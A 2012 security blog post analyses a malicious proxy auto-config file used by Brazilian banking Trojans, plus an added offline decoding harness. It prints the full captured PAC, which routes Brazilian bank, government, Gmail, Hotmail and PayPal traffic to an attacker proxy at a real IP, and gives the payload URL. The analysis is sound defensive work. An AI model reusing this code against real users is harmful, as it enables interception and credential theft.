Saturday, April 07, 2012

Malicious PAC files used by Brazilian Trojans

I just want to share some information about Brazilian banker Trojans which, in recent years, have used PAC files for automatic proxy configuration, applied only to selected destinations such as banks and webmail.

I captured this PAC file last week; it uses a simple obfuscation technique:


function FindProxyForURL(url, host) {
  // Target hostnames, obfuscated by simple letter substitution:
  // f stands for e, z for y, "duh" for "www", and y for i.
  var n = new Array("duh.bradfsco",
      "bradfsco",
      "duh.bradfscoprimf",
      "bradfscoprimf",
      "duh.santandfrfmprfsaryal",
      "santandfrfmprfsaryal",
      "hsbc",
      "duh.hsbc",
      "hsbcprfmyfr",
      "duh.hsbcprfmyfr",
      "santandfrfmprfsaryal",
      "santanderempresarial",
      "banfspa",
      "duh.banfspa",
      "santandfr",
      "duh.santandfr",
      "santandfr",
      "bancorfal",
      "duh.bancorfal",
      "syds.mg.gov.br",
      "duh.syds.mg.gov.br",
      "cytybank",
      "duh.cytybank",
      "sycredy",
      "duh.sycredy",
      "amerycanexpress",
      "duh.amerycanexpress",
      "ytau",
      "duh.ytau",
      "ytaupersonnalyte",
      "duh.ytaupersonnalyte",
      "hotmayl",
      "duh.hotmayl",
      "lyve",
      "duh.lyve",
      "pazpal",
      "duh.pazpal",
      "cayxa.gov.br",
      "duh.cayxa.gov.br",
      "duh.gmayl",
      "gmayl",
      "duh.hotmayl",
      "hotmayl"
  );

  for (var i = 0; i < n.length; i++) {
    str = n[i];
    // Undo the substitutions, in this order, to recover the real hostname.
    str = str.replace(/f/gi, "e");
    str = str.replace(/z/gi, "y");
    str = str.replace(/duh/gi, "www");
    str = str.replace(/y/gi, "i");
    // Append the TLD; caixa.gov.br is already a complete hostname.
    if (str.indexOf("caixa") != -1)
      str = str;
    else if (str.indexOf("paypal") != -1)
      str = str + ".com";
    else if (str.indexOf("gmail") != -1)
      str = str + ".com";
    else if (str.indexOf("hotmail") != -1)
      str = str + ".com";
    else
      str = str + ".com.br";
    // Only traffic to the targeted hosts is routed through the attacker's proxy.
    if (shExpMatch(host, str)) {
      return "PROXY 218.208.33.196:80";
    }
  }
  // Everything else goes direct, so the victim notices nothing unusual.
  return "DIRECT";
}
 
Note that, beyond Brazilian banks, the list also covers Gmail, Hotmail/Live and PayPal, so the proxy doubles as a credential harvester for those services.
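To analyse a sample like this without loading it into a browser, the substitution steps can be replayed offline. The following is an added analysis harness, not code from the post or the captured PAC; it reuses a subset of the obfuscated entries, assumes a minimal shExpMatch shim with the usual PAC wildcard semantics, and reports which hosts would be sent to the proxy.

```javascript
// Added analysis harness (not part of the captured PAC): re-implements the
// sample's substitution steps so the plaintext hostnames can be recovered and
// the PAC's routing decision can be checked offline, without a browser.

// Constructed subset of the obfuscated entries from the captured sample.
const OBFUSCATED = [
  "duh.bradfsco", "santandfrfmprfsaryal", "hsbc", "cayxa.gov.br",
  "duh.gmayl", "hotmayl", "pazpal", "ytau", "cytybank",
];

// Same four substitutions, in the same order the PAC applies them
// (f->e, z->y, duh->www, y->i), followed by the same TLD rule.
function decodeEntry(entry) {
  let str = entry
    .replace(/f/gi, "e")
    .replace(/z/gi, "y")
    .replace(/duh/gi, "www")
    .replace(/y/gi, "i");
  if (str.indexOf("caixa") !== -1) return str; // already a full hostname
  if (/paypal|gmail|hotmail/.test(str)) return str + ".com";
  return str + ".com.br";
}

// Decoded, de-duplicated list: usable as a watchlist of targeted hostnames.
function decodeAll(entries) {
  return [...new Set(entries.map(decodeEntry))];
}

// Minimal shExpMatch shim (assumption: a shell expression where * and ?
// are wildcards and the match is anchored to the whole host).
function shExpMatch(host, pattern) {
  const escaped = pattern
    .replace(/[.+^${}()|[\]\\]/g, "\\$&")
    .replace(/\*/g, ".*")
    .replace(/\?/g, ".");
  return new RegExp("^" + escaped + "$").test(host);
}

// The PAC's decision for one host; the proxy address is the one in the sample.
function proxyDecision(host, entries = OBFUSCATED) {
  for (const e of entries) {
    if (shExpMatch(host, decodeEntry(e))) return "PROXY 218.208.33.196:80";
  }
  return "DIRECT";
}
```

Replaying the steps also exposes a quirk of the sample: because y is replaced with i after z has been replaced with y, pazpal decodes to paipal.com.br rather than paypal.com, so that entry never matches a real host.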
 
The URL for the auto-proxy configuration that I found:
 
http://218.208.33.196/readme/feather.txt
 
This IP has a bad reputation for open-proxy, spam and phishing activity.
  
Some references by @assoline:
 
Benign_Feature_Malicious_Use
attackers-using-malicious-pac-files-phishing-attacks